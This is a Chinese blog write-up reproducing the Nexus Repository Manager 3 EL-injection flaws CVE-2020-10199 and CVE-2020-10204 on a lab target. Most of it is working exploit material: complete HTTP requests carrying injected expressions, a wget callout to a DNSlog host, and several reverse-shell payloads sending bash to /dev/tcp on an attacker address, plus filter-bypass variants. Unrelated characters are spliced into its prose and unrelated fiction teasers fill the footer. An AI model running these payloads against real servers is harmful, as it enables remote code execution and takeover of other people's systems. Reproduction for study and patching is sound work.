Nexus Repository Manager 3 RCE (CVE-2020-10199/10204) 復(fù)現(xiàn)

0x00 前言

本次漏洞復(fù)現(xiàn)使用

靶機(jī):vulfocus

0x01 描述

Nexus Repository Manager 3 是一款軟件倉(cāng)庫(kù)祝峻,可以用來(lái)存儲(chǔ)和分發(fā) Maven 晌端、 NuGET 等軟件源倉(cāng)庫(kù)

Nexus Repository Manager官方發(fā)布了CVE-2020-10199捐寥,CVE-2020-10204的漏洞公告暑劝,10199的漏洞需要普通用戶權(quán)限即可觸發(fā),而10204則需要管理員權(quán)限句惯。兩個(gè)漏洞的觸發(fā)原因均是不安全的執(zhí)行EL表達(dá)式導(dǎo)致的

影響版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

默認(rèn)端口:

8081    Sonatype Nexus Repository 管理頁(yè)面

復(fù)現(xiàn)準(zhǔn)備

啟動(dòng)環(huán)境

image

每次啟動(dòng)環(huán)境映射的端口都不同镐捧,按照實(shí)際映射端口訪問(wèn)就可以看到Web界面了

image

預(yù)留的用戶名/密碼:

admin/admin

0x02 漏洞復(fù)現(xiàn)(普通賬號(hào)執(zhí)行方法)

此方法普通賬號(hào)和管理員賬號(hào)皆適用

image

登陸后替換Cookie和CSRF Token,發(fā)送數(shù)據(jù)包循诉,即可執(zhí)行EL表達(dá)式

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}
image
image

DNSlog 測(cè)試

進(jìn)行 DNSlog 嘗試横辆,開(kāi)始嘗試使用 pingcurl 都無(wú)法成功執(zhí)行 EL 表達(dá)式茄猫,最后嘗試使用了 wget 命令成功獲取請(qǐng)求記錄

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget hvqkwp.dnslog.cn')}
image

反彈shell

開(kāi)始直接使用下面語(yǔ)句進(jìn)行反彈并無(wú)任何反應(yīng)

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}

經(jīng)過(guò)資料查閱狈蚤,發(fā)現(xiàn)了存在的問(wèn)題:

https://blog.spoock.com/2018/11/25/getshell-bypass-exec/

經(jīng)過(guò)多次嘗試,最終的payload

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xx.xx.xx.xx/6543 0>&1')}
image
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/xx.xx.xx.xx/6543<&1')}
image

2.3 漏洞復(fù)現(xiàn)(管理員賬號(hào)執(zhí)行方法)

此方法只適用于管理員賬號(hào)

POST /service/extdirect HTTP/1.1
Host: 118.193.36.37:64521
Content-Length: 290
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8501743136715239
Content-Type: application/json
Accept: */*
Origin: http://118.193.36.37:64521
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://118.193.36.37:64521/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8501743136715239; _ga=GA1.1.1177666056.1593768292; _gid=GA1.1.174097340.1593768292; NXSESSIONID=8c94eba8-2764-4b02-801f-e4c58769cb4d
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget im87gx.dnslog.cn')}"],"roles":[]}],"type":"rpc","tid":89}

注意替換 CookieCSRF-TOKEN

image
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末划纽,一起剝皮案震驚了整個(gè)濱河市脆侮,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌勇劣,老刑警劉巖靖避,帶你破解...
    沈念sama閱讀 211,042評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異比默,居然都是意外死亡幻捏,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,996評(píng)論 2 384
  • 文/潘曉璐 我一進(jìn)店門命咐,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)篡九,“玉大人,你說(shuō)我怎么就攤上這事醋奠¢痪剩” “怎么了?”我有些...
    開(kāi)封第一講書人閱讀 156,674評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵窜司,是天一觀的道長(zhǎng)沛善。 經(jīng)常有香客問(wèn)我,道長(zhǎng)例证,這世上最難降的妖魔是什么路呜? 我笑而不...
    開(kāi)封第一講書人閱讀 56,340評(píng)論 1 283
  • 正文 為了忘掉前任,我火速辦了婚禮织咧,結(jié)果婚禮上胀葱,老公的妹妹穿的比我還像新娘。我一直安慰自己笙蒙,他們只是感情好抵屿,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,404評(píng)論 5 384
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著捅位,像睡著了一般轧葛。 火紅的嫁衣襯著肌膚如雪搂抒。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書人閱讀 49,749評(píng)論 1 289
  • 那天尿扯,我揣著相機(jī)與錄音求晶,去河邊找鬼。 笑死衷笋,一個(gè)胖子當(dāng)著我的面吹牛芳杏,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播辟宗,決...
    沈念sama閱讀 38,902評(píng)論 3 405
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼爵赵,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了泊脐?” 一聲冷哼從身側(cè)響起空幻,我...
    開(kāi)封第一講書人閱讀 37,662評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎容客,沒(méi)想到半個(gè)月后秕铛,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,110評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡耘柱,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,451評(píng)論 2 325
  • 正文 我和宋清朗相戀三年如捅,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了棍现。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片调煎。...
    茶點(diǎn)故事閱讀 38,577評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖己肮,靈堂內(nèi)的尸體忽然破棺而出士袄,到底是詐尸還是另有隱情,我是刑警寧澤谎僻,帶...
    沈念sama閱讀 34,258評(píng)論 4 328
  • 正文 年R本政府宣布娄柳,位于F島的核電站,受9級(jí)特大地震影響艘绍,放射性物質(zhì)發(fā)生泄漏赤拒。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,848評(píng)論 3 312
  • 文/蒙蒙 一诱鞠、第九天 我趴在偏房一處隱蔽的房頂上張望挎挖。 院中可真熱鬧,春花似錦航夺、人聲如沸蕉朵。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 30,726評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)始衅。三九已至冷蚂,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間汛闸,已是汗流浹背蝙茶。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 31,952評(píng)論 1 264
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留诸老,地道東北人尸闸。 一個(gè)月前我還...
    沈念sama閱讀 46,271評(píng)論 2 360
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像孕锄,于是被迫代替她去往敵國(guó)和親吮廉。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,452評(píng)論 2 348